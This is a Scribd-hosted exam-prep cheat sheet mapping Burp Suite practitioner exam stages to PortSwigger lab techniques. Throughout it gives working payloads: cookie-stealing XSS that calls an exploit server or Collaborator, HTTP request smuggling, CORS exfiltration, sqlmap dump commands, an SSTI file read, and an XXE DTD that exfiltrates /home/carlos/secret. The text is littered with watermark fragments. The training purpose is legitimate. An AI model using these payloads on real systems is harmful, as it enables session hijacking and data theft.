Scribd
Upload
97 views32 pages

Burp Dec 2022

This document outlines attack vectors for different stages of a hacking simulation. Stage 1 involves gaining unauthorized access to user accounts, such as by password reset poisoning, session hijacking, or brute force attacks. Stage 2 is escalating privileges to the administrator account using SQL injection or other vulnerabilities. Stage 3 involves reading a secret file on the victim's system through server-side template injection, XML external entity injection, local file inclusion, or other attacks.

Uploaded by

Bdiaf Mohammed
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
97 views32 pages

Burp Dec 2022

This document outlines attack vectors for different stages of a hacking simulation. Stage 1 involves gaining unauthorized access to user accounts, such as by password reset poisoning, session hijacking, or brute force attacks. Stage 2 is escalating privileges to the administrator account using SQL injection or other vulnerabilities. Stage 3 involves reading a secret file on the victim's system through server-side template injection, XML external entity injection, local file inclusion, or other attacks.

Uploaded by

Bdiaf Mohammed
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 32

VA A19 912 2

These are the attack vectors for each stage as of December 2nd Week 2022.

STAGE1 Objective – Login as carlos/guest/any other valid user


VA 19 12

STAGE1.APP1 – Password reset poisoning to steal reset password token of user carlos/guest
VA 19 12

STAGE1.APP2 – Web-cache poisoning to steal user carlos’s session cookie


VA 19 12

STAGE1.APP3 – HTTP request smuggling to steal user carlos’s session cookie


STAGE1.APP4 – XSS to steal user carlos’s session cookie where most tags and attributes are blocked
VA 19 12

STAGE1.APP5 – XSS to steal user carlos’s session cookie via web messages and JSON.parse
VA 19 12

STAGE1.APP6 – XSS to steal user carlos’s session cookie where “<script>” is blocked
STAGE1.APP7 – Brute forcing username and password to login to victim account
VA 19 12

STAGE1.APP8 – Brute forcing username and password to login to victim account - Variation
VA 19 12
VA 19 12

STAGE2 Objective – Get access to “administrator” account


VA 19 12

STAGE2.APP1 – SQL injection in advanced search bar to retrieve administrator’s password


VA 19 12

STAGE2.APP2 – IDOR via “Change user email” function to login as administrator


VA 19 12

STAGE2.APP3 – CSRF and cookie manipulation via “Update email” function to login as administrator
STAGE2.APP4 – CORS misconfiguration to steal administrator session
VA 19 12
VA 19 12

STAGE3 Objective – read “/home/carlos/secret” file and submit the solution


VA 19 12

STAGE3.APP1 – SSTI in reset email template to read “/home/carlos/secret” file


VA 19 12

STAGE3.APP2 – XXE with external DTD to read “/home/carlos/secret” file


VA 19 12

STAGE3.APP3 – XXE with command injection to read “/home/carlos/secret” file


STAGE3.APP4 – LFI in image file path to read “/home/carlos/secret” file
VA 19 12

STAGE3.APP5 – OS command injection to read “/home/carlos/secret” file


VA 19 12

STAGE3.APP6 – SSRF to read “/home/carlos/secret” file


VA 19 12

STAGE3.APP7 – File upload bypass to upload a .php file to read “/home/carlos/secret” file
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
V 1 1
VA A19 912 2

STAGE1.APP1 – Password reset poisoning to steal reset password token of user carlos/guest
VA 19 12

1. If you see “/resources/js/tracking.js” in the response and don’t see “X-Cache: hit" and “X-Cache:
VA 19 12

miss” as response headers, this is the vector. However, there are instances where you won’t see
“/resources/js/tracking.js” and yet the vector is the same. This is just a quick way to figure out the
VA 19 12

vector but do try this out even if the above-mentioned indicators are not there.
VA 19 12

2. Brute force the login to find a valid username, use the username list from -
VA 19 12

https://portswigger.net/web-security/authentication/auth-lab-usernames
3. Application returns different responses on valid and invalid usernames so figure out the valid
VA 19 12

username by looking at the response.


VA 19 12

4. Most of the time it’s either “carlos” or “guest”.


5. Initiate a “Reset/Forgot Password” request with the found user, let’s just say the valid user is
VA 19 12

“carlos” and intercept the request.


VA 19 12

6. Add “X-Forwarded-Host” header with your exploit server URL to the request and forward the
VA 19 12

request.
VA 19 12

X-Forwarded-Host: your-exploit-server-id.exploit-server.net
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12

7. Go to exploit server and you should be able to see the request to reset password with password
VA 19 12

reset token.
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
V 1 1
VA A19 912 2

8. Go to the link and you will be prompted to change the password for “carlos”.
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12

9. Change the password to anything. And login to “carlos” with the set password.
VA 19 12

10. STAGE1 solved!


VA 19 12
VA 19 12

Sample lab from Burp Academy


VA 19 12

https://portswigger.net/web-security/host-header/exploiting/password-reset-poisoning/lab-host-
header-basic-password-reset-poisoning
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
V 1 1
VA A19 912 2

STAGE1.APP2 – Web-cache poisoning to steal user carlos’s session cookie


VA 19 12

1. If you see “/resources/js/tracking.js” in the response while seeing “X-Cache: hit" and “X-Cache:
VA 19 12

miss” as response headers, this is the vector.


2. While testing, make sure to add a cache-buster parameter, like ?cdd=22333 not to poison the
VA 19 12

main page until you get the attack setup properly.


VA 19 12

3. Add “X-Forwarded-Host” header with your exploit server URL to the request and forward the
VA 19 12

request.
VA 19 12

X-Forwarded-Host: your-exploit-server-id.exploit-server.net
VA 19 12

4. Keep repeating the request until you see the absolute path of the “/resources/js/tracking.js” file
VA 19 12

is changed to “//your-exploit-server-id.exploit-server.net/resources/js/tracking.js”
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12

5. Go to the exploit server and change the file name of the exploit file path to:
VA 19 12

/resources/js/tracking.js
VA 19 12
VA 19 12

6. Enter the following javascript payload in the body of the exploit. Make sure to change the exploit
VA 19 12

server URL properly.


VA 19 12

document.location='https://your-exploit-server-id.web-security-
VA 19 12

academy.net/cookie.php?c='+document.cookie;
VA 19 12

7. Go back and repeat the request until you see “X-Cache: miss” is changed to “X-Cache: hit”.
VA 19 12
VA 19 12
VA 19 12
V 1 1

8. Once you see “X-Cache: hit” in the response, this means that the response came from the cache.
VA A19 912 2

9. Now remove the cache-buster and repeat the request to poison the main page.
10. Once you see “X-Cache: hit” in the response, wait a while and go to the exploit server and check
the log for the session cookie of user “carlos”.
VA 19 12

11. Use the cookie to login as user “carlos”.


VA 19 12

12. STAGE1 solved!


VA 19 12

Sample lab from Burp Academy


VA 19 12

https://portswigger.net/web-security/host-header/exploiting/lab-host-header-web-cache-
VA 19 12

poisoning-via-ambiguous-requests
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
V 1 1
VA A19 912 2

STAGE1.APP3 – HTTP request smuggling to steal user carlos’s session cookie

1. Visit any blog post, and if you see “User-Agent” reflected in the response, this is the vector.
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12

2. Send home page/base page of the application active burp scan. You can select any scan
VA 19 12

configuration. As a reference, we have used “Audit coverage – thorough”. Once the scan is done,
you will see “HTTP request smuggling” finding is the scan results.
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12

3. The attack vector for this stage is XSS via HTTP request smuggling. The inputs you do in “User-
VA 19 12

Agent” header for blog post request, will be reflected in the response. Therefore, we can use a
XSS payload via “User-Agent” header to trigger XSS. But, since the payload is delivered via a
VA 19 12

request header, the only way to weaponize this and send to another user is via HTTP request
smuggling.
V 1 1

4. Now let’s prepare the request with the XSS payload.


5. From the burp scan result, take the “Request 1” HTTP request and send it to repeater.
6. Remove all unnecessary headers and keep only the following headers: Host, Cookie, Connection,
Content-Type. Both Transfer-Encoding headers and Content-Length. It should look something like
this.
VA A19 912 2
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12

7. Note that getting the “Content-Length” properly is the only way to get this attack to work. As
VA 19 12

shown in the above screenshot, 25 characters are counted from starting line 10 to end of line 14.
Use the inspector in Repeater to get this value accurately.
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12

8. Now, it’s time to append the request that we need to smuggle into the above request. It will look
VA 19 12

something like this.


VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
V 1 1
VA A19 912 2

Exploit code

GET /post?postId=1 HTTP/1.1


VA 19 12

Host: your-lab-id.web-security-academy.net
VA 19 12

User-agent: "><script>alert(document.cookie);var x=new


XMLHttpRequest();x.open("GET","https://<your-burp-collaborator-
VA 19 12

instance-id>/"+document.cookie);x.send();</script>
VA 19 12

9. Things to note here:


VA 19 12

• “postId” value should be any valid post ID value, just browse to any post ID value and use
VA 19 12

that.
VA 19 12

• In the main request, make sure “Connection: close” header is set. It should work with
“Connection: keep-alive” too but better to use “Connection: close” it was tested to be
VA 19 12

working multiple times.


VA 19 12

• Now to get the “Content-Length” value correctly. Replace your lab ID and Burp
collaborator instances properly in the exploit code and paste it starting line 14. And using
VA 19 12

the Inspector in repeater, select everything starting line 14 until the last > character in the
VA 19 12

payload. In my example, the total number of characters were noted to be 295. So, need
VA 19 12

to update the “Content-Length” header with 295.


• Replace lab IDs and Burp collaborator instance IDs properly.
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12

10. Now we are ready to exploit. Send the whole request to Intruder. Clear all the payload positions
and as we just need to send about 100 null requests to smuggle the request to the victim.
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
V 1 1
VA A19 912 2

11. Start the attack, and if all the steps are done properly, all the requests should show “200” status
and you should see your smuggled request reflecting the XSS payload in some of the responses. If
the status is anything other than “200”, something is wrong. Go back and redo the steps.
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12

12. Check Burp collaborator log after a while. The session cookie of user “carlos” will be there as part
VA 19 12

of the guest request.


VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12

13. Use the session cookie and login as user “carlos”.


VA 19 12

14. STAGE1 solved!


VA 19 12

Sample lab from Burp Academy


VA 19 12
VA 19 12

https://portswigger.net/web-security/request-smuggling/exploiting/lab-deliver-reflected-xss
VA 19 12
VA 19 12
V 1 1
VA A19 912 2

STAGE1.APP4 – XSS to steal user carlos’s session cookie where most tags and attributes are blocked

1. The easiest way to identify this vector is by injecting the following payload into the search function
VA 19 12

of the application. If it is rejected, this is the vector.


VA 19 12

</ScRiPt>
VA 19 12
VA 19 12

2. Running Burp scan on the search function will also confirm that XSS exists but as HTML injection.
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12

3. Refer to the below lab and run Intruder to figure out which tags and attributes are allowed by the
VA 19 12

application.
VA 19 12

https://portswigger.net/web-security/cross-site-scripting/contexts/lab-html-context-with-most-
VA 19 12

tags-and-attributes-blocked
VA 19 12
VA 19 12

4. According to the scans there can be 4 different combinations of tags and attributes allowed:
VA 19 12

• <body onhashchange>
VA 19 12

• <body onload>
• <body onmessage>
VA 19 12

• <body onpopstate>
VA 19 12
VA 19 12
VA 19 12
V 1 1
VA A19 912 2

5. Depending on the payload that works, go to the exploit server, and use below payloads. Make
sure to change the search parameter (it can be ?query=, it can be ?find= or it can be ?search-
term=) depending on the lab you receive and make sure change the exploit server location on
VA 19 12

base64 encoded highlighted part (if any) accordingly. And exploit should be hosted on the default
VA 19 12

location of the exploit server (/exploit).


VA 19 12

<body onhashchange>
VA 19 12

<iframe src="https://your-lab-id.web-security-
VA 19 12

academy.net/?query=%27%3Cbody%20onhashchange=%22eval(atob('ZG9jdW1lbnQu
VA 19 12

bG9jYXRpb24MDFlZjg2NTkxYzA4ZDFlZGMwMWNlMDBiYy53ZWItc2VjdXJpdHktYWNhZGVt
VA 19 12

eS5uZXQvP2M9Jytkb2N1bWVudC5jb29raWU='))%22%3E//"
onload="this.onload='';this.src+='#XSS'"></iframe>
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12

<body onmessage>
VA 19 12

<!DOCTYPE html>
VA 19 12

<body onload="CrossPwn()">
VA 19 12

<h2>CrossPwn</h2>
<p>OnMessage XSS</p>
VA 19 12

<p>Use target & msg as URL parameters.</p>


VA 19 12

<iframe id="f" height="0" style="visibility:hidden">


</iframe>
VA 19 12

<script>
VA 19 12

searchParams = new URLSearchParams(document.location.search);


VA 19 12

target = searchParams.get('target');
msg = searchParams.get('msg');
VA 19 12

document.getElementById('f').setAttribute('src', target);
VA 19 12

function CrossPwn() {frames[0].postMessage(msg,'*')}


</script>
VA 19 12

</body>
VA 19 12

</html>
VA 19 12

<iframe src="https://your-exploit-server-id.exploit-
VA 19 12

server.net/exploit?target=https://your-lab-id.web-security-
academy.net/?SearchTerm=%3Cbody%20onmessage=document.location=%22https:
V 1 1

//your-exploit-server-id.exploit-
server.net/?c=%22%25%32%62(document.cookie)%3E>">
VA A19 912 2

<body onload>

<iframe src="https://your-lab-id.web-security-
VA 19 12

academy.net/?searchterm=%22%3E%3Cbody%20onload=%22document.location%22%
VA 19 12

5D%3D%22https%3A%2F%2Ffanyv88.com%3A443%2Fhttps%2Fyour-exploit-server-id%252eweb-security-
academy%252enet/?c='+document%252ecookie"%22%3E//">
VA 19 12
VA 19 12

<body onpopstate>
VA 19 12

<iframe src="https://your-lab-id.web-security-
VA 19 12

academy.net/?searchTerm=%27%3Cbody%20onpopstate=%22eval(atob(%27ZG9jdW1
lbnQubG9jYlOTAyYzAyZTFmYjIwMTQxMDBmYi5leHBsb2l0LXNlcnZlci5uZXQvP2M9Jytk
VA 19 12

b2N1bWVudC5jb29raWU=%27))%22%3E"
VA 19 12

onload="if(!window.flag){this.contentWindow.location='https://your-lab-
id.web-security-
VA 19 12

academy.net/?searchTerm=%27%3Cbody%20onpopstate=%22eval(atob(%27ZG9jdW1
lbnQubG9jYXRphlOTAyYzAyZTFmYjIwMTQxMDBmYi5leHBsb2l0LXNlcnZlci5uZXQvP2M9
VA 19 12

Jytkb2N1bWVudC5jb29raWU=%27))%22%3E#';flag=1}"></iframe>
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12

6. Store the exploit and click “Deliver exploit to victim”. Wait a while and go to the server log to
V 1 1

extract the cookie.


VA A19 912 2
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12

8. STAGE1 solved!
VA 19 12
VA 19 12

tags-and-attributes-blocked
VA 19 12

Sample lab from Burp Academy


VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
7. Use the session cookie and login as user “carlos”.

VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
https://portswigger.net/web-security/cross-site-scripting/contexts/lab-html-context-with-most-

VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
V 1 1
VA A19 912 2

STAGE1.APP5 – XSS to steal user carlos’s session cookie via web messages and JSON.parse

1. If you see “JSON.parse(e.data);” string in the response of the lab, this is the vector.
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12

2. Use the below payload in the exploit server. Make sure the change the lab ID and exploit server
VA 19 12

ID properly.
VA 19 12

<iframe src=https://your-lab-id.web-security-academy.net/
VA 19 12

onload='this.contentWindow.postMessage("{\"type\":\"redirect\",\"redire
ctUrl\":\"javascript:window.location=%22https://your-exploit-server-
VA 19 12

id.web-security-academy.net/?c=%22%2bdocument.cookie\"}","*")'>
VA 19 12
VA 19 12

3. Store the exploit and click “Deliver exploit to victim”. Wait a while and go to the server log to
extract the cookie.
VA 19 12

4. Use the session cookie and login as user “carlos”.


VA 19 12

5. STAGE1 solved!
VA 19 12

Sample lab from Burp Academy


VA 19 12

https://portswigger.net/web-security/dom-based/controlling-the-web-message-source/lab-dom-
VA 19 12

xss-using-web-messages-and-json-parse
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
V 1 1
VA A19 912 2

STAGE1.APP6 – XSS to steal user carlos’s session cookie where “<script>” is blocked
VA 19 12

1. The easiest way to identify this vector is by injecting the following payload into the search function
VA 19 12

of the application. If it is accepted, this is the vector.


VA 19 12

</ScRiPt>
VA 19 12

2. Running Burp scan on the search function will also confirm that XSS exists with the proper bypass.
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12

3. Use the below payload in the exploit server. Make sure the change the lab ID and exploit server
ID properly. Make sure to change the search parameter (it can be ?query=, it can be ?find= or it
VA 19 12

can be ?search-term=) depending on the lab you


VA 19 12

<script>location='https://your-lab-id.web-security-
VA 19 12

academy.net/?lookup=%3C%2FScRiPt%20%3E%3Cimg%20src%3Da%20onerror%3D%28d
VA 19 12

ocument.location%29%3D%22https%3A%2F%2Ffanyv88.com%3A443%2Fhttps%2Fyour-exploit-server-id.web-
security-academy.net%2F%3F%22%2B%28document.cookie%29%3E';</script>
VA 19 12
VA 19 12

4. Store the exploit and click “Deliver exploit to victim”. Wait a while and go to the server log to
extract the cookie.
VA 19 12

5. Use the session cookie and login as user “carlos”.


VA 19 12

6. STAGE1 solved!
VA 19 12

Sample lab from Burp Academy


VA 19 12

https://portswigger.net/web-security/cross-site-scripting/contexts/lab-javascript-url-some-
VA 19 12

characters-blocked
VA 19 12
V 1 1
VA A19 912 2

STAGE1.APP7 – Brute forcing username and password to login to victim account

1. If none of the above vectors work, most likely this would be the vector.
VA 19 12

2. First figure out the valid usernames in the application. Application returns different responses on
VA 19 12

valid and invalid usernames so figure out the valid username by looking at the response. You can
try usernames from here: https://portswigger.net/web-security/authentication/auth-lab-
VA 19 12

usernames
VA 19 12

3. Once valid usernames are figured out, initiate a login request, and send it to intruder.
VA 19 12

4. Use the password list from https://portswigger.net/web-security/authentication/auth-lab-


passwords and start brute forcing.
VA 19 12

5. When the correct combination of username and password is found, you will see a “302 Found”
VA 19 12

response.
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12

6. Login with the username and password combination.


7. STAGE1 solved!
VA 19 12
VA 19 12

Sample lab from Burp Academy


VA 19 12

https://portswigger.net/web-security/authentication/password-based/lab-username-enumeration-
via-different-responses
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
V 1 1
VA A19 912 2

STAGE1.APP8 – Brute forcing username and password to login to victim account - Variation

1. This is the same as STAGE1.APP7, but if you try to brute force with known usernames in the list,
VA 19 12

the anti-csrf token will invalidate and the brute force won’t work.
VA 19 12

2. So, get the usernames from here: https://portswigger.net/web-security/authentication/auth-


lab-usernames
VA 19 12

3. Remove known usernames like “carlos”, “administrator”, “admin” from the list and run the
VA 19 12

brute force until a valid username is found.


VA 19 12

4. Once, a correct username is found, use the password list from https://portswigger.net/web-
security/authentication/auth-lab-passwords and start brute forcing.
VA 19 12

5. When the correct combination of username and password is found, you will see a “302 Found”
VA 19 12

response.
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12

6. Login with the username and password combination.


7. STAGE1 solved!
VA 19 12
VA 19 12

Sample lab from Burp Academy


VA 19 12

https://portswigger.net/web-security/authentication/password-based/lab-username-enumeration-
VA 19 12

via-different-responses
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
V 1 1
VA A19 912 2

STAGE2.APP1 – SQL injection in advanced search bar to retrieve administrator’s password

1. Once you are logged in as a normal user, most of the time as user “carlos”, if you see “Advanced
VA 19 12

Search” option, this is the vector.


VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12

2. Do a quick single quote injection to confirm which parameter is vulnerable. Depending on the lab,
VA 19 12

the parameter changes.


VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12

3. Run Burp scan on the function incase you want to confirm the SQL injection.
VA 19 12

4. Two ways to run SQL map to dump administrator password.


VA 19 12

• Copy the whole GET request to a file and run sqlmap using -r using the following command:
VA 19 12

sqlmap -r <filename> --force-ssl -p <parameter> --risk 3--level 3 --


VA 19 12

dump -T users
VA 19 12

• Run sqlmap directly on the URL. Make sure to use the proper URL and cookies from your
VA 19 12

session. Add a * on the parameter that is vulnerable to sql injection to make data dumping
VA 19 12

efficient.
VA 19 12

sqlmap -u "https://you-lab-id.web-security-
VA 19 12

academy.net/filtered_search?query=test*&OrganizeBy=DATE&author=" --
VA 19 12

cookie="_lab=your-lab-cookie; session=your-session-cookie" --risk 3


--level 3 --dump -T users
V 1 1

5. Once done, you should have the password for administrator user.
VA A19 912 2
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
7. STAGE2 solved!

VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
6. Use the password and login to administrator account.

VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
V 1 1
VA A19 912 2

STAGE2.APP2 – IDOR via “Change user email” function to login as administrator

1. If you see the change email/update email request in the following JSON format, this is the
VA 19 12

vector.
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12

2. Send the request to Intruder and manually add “roleid: $$” string into the request body.
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12

3. Run the attack from 1 to 200 and you will notice two “302” responses.
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12

4. Take the request and request it using browser. Now you should be logged in administrator.
VA 19 12

5. STAGE2 solved!
VA 19 12

Sample lab from Burp Academy


V 1 1

https://portswigger.net/web-security/access-control/lab-user-role-can-be-modified-in-user-profile
VA A19 912 2

STAGE2.APP3 – CSRF and cookie manipulation via “Update email” function to login as administrator

1. If you see the following session cookie format after logging in as “carlos”, this is the vector.
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12

2. While logged in, initiate an email change request. You can pause this request in Interceptor or just
VA 19 12

let it go through. The important thing is to note down or copy the session cookie value and csrf
token. Make sure the session cookie value “isloggedin”:true is set.
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12

3. In an Incognito browser session, go to the application, initiate a password reset request for
VA 19 12

administrator and intercept the request. Replace the session cookie value and csrf token value in
VA 19 12

this request and forward the request. In the response, you should see an administrator
VA 19 12

“isloggedin”:true.
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
V 1 1
VA A19 912 2
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
5. STAGE2 solved!

VA 19 12
VA 19 12
VA 19 12
Sample lab from Burp Academy

VA 19 12
VA 19 12
VA 19 12
4. Use this cookie and login as administrator.

VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
https://portswigger.net/web-security/csrf/lab-token-not-tied-to-user-session

VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
V 1 1
VA A19 912 2

STAGE2.APP4 – CORS misconfiguration to steal administrator session


VA 19 12

1. If you see the following script in the response while in the user account page, this is the vector.
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12

2. If you go to URL from the response, you will see the active session cookies for your account. Make
VA 19 12

sure to include the “UnixTimeStamp” parameter as well.


VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12

3. The request to “/accountdetails/” will timeout if the “UnixTimeStamp” is expired. So, make sure
VA 19 12

to refresh the account page to get a new value or you can use a future value.
VA 19 12
VA 19 12

4. When you add “Origin” header with any arbitrary domain, you can see that it’s reflected in the
response with “Access-Control-Allow-Origin: domain” and “Access-Control-Allow-Credentials:
VA 19 12

true”. This confirms the existence of CORS vulnerability.


VA 19 12
VA 19 12
VA 19 12
VA 19 12
V 1 1

5. Go to exploit server and paste the following payload: Make sure your lab URL is correct,
“/accountdetails/” path is set with a valid “UnixTimeStamp”.
VA A19 912 2
VA 19 12
VA 19 12

<script>
VA 19 12

var req = new XMLHttpRequest();


VA 19 12

req.onload = reqListener;
req.open('get','https://your-lab-id.web-security-
VA 19 12

academy.net/accountdetails/?UnixTimestamp=1111111111111',true);
VA 19 12

req.withCredentials = true;
req.send();
VA 19 12
VA 19 12

function reqListener() {
location='/log?key='+this.responseText;
VA 19 12

};
VA 19 12

</script>
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12

6. Deliver the exploit to victim. This time, the victim will be the administrator. Check the log in a
VA 19 12

while and see the admin cookie is logged.


VA 19 12

7. Get the cookie and login to application as administrator.


VA 19 12

8. STAGE2 Solved!
VA 19 12

Sample lab from Burp Academy


VA 19 12

https://portswigger.net/web-security/cors/lab-basic-origin-reflection-attack
VA 19 12
V 1 1
VA A19 912 2

STAGE3.APP1 – SSTI in reset email template to read “/home/carlos/secret” file

1. If you see Admin panel like this, then this is the vector.
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12

2. Change {{username}} to the following payload:


VA 19 12
VA 19 12

{{
VA 19 12

''.__class__.__mro__[2].__subclasses__()[40]('/home/carlos/secret').rea
d() }}
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12

3. Change admin’s email address or carlos’ email address to the email address given in exploit server.
VA 19 12

4. Logout from the application and initiate a password request to either admin or carlos accordingly.
VA 19 12

5. Go to email log and extract the solution and submit it.


VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12

6. STAGE3 solved!
V 1 1

Sample lab from Burp Academy

https://portswigger.net/web-security/server-side-template-injection/exploiting/lab-server-side-
template-injection-basic-code-context
VA A19 912 2

STAGE3.APP2 – XXE with external DTD to read “/home/carlos/secret” file

1. If there is a file upload (add users) with .xml file upload, this is the vector. If you follow all the
VA 19 12

steps properly and if this doesn’t work, move on to STAGE3.APP3 – XXE with command injection
to read “/home/carlos/secret” file vector.
VA 19 12

2. Create a .xml file with the following payload:


VA 19 12

<?xml version="1.0" encoding="UTF-8"?>


VA 19 12

<!DOCTYPE foo [
VA 19 12

<!ENTITY % xxe SYSTEM "https://your-exploit-server-id.security-


academy.net/exploit.dtd"> %xxe; ]>
VA 19 12

<users>
VA 19 12

<user>
<username>Example1</username>
VA 19 12

<email>[email protected]</email>
VA 19 12

</user>
<user>
VA 19 12

<username>&xxe;</username>
VA 19 12

<email>[email protected]</email>
</user>
VA 19 12

</users>
VA 19 12

3. Go to exploit server. Change the path to “exploit.dtd” and paste the following payload in the
VA 19 12

body and save it. Make sure to replace the Burp collaborator instance ID.
VA 19 12
VA 19 12

<!ENTITY % file SYSTEM "file:///home/carlos/secret">


<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://your-burp-
VA 19 12

collaborator-instance-id.net/?x=%file;'>">
VA 19 12

%eval;
%exfil;
VA 19 12
VA 19 12

4. Now upload the .xml file from step 2. You will receive a server error while trying to upload the
file but just ignore that.
VA 19 12

5. Poll your collaborator and note the solution in the GET request.
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
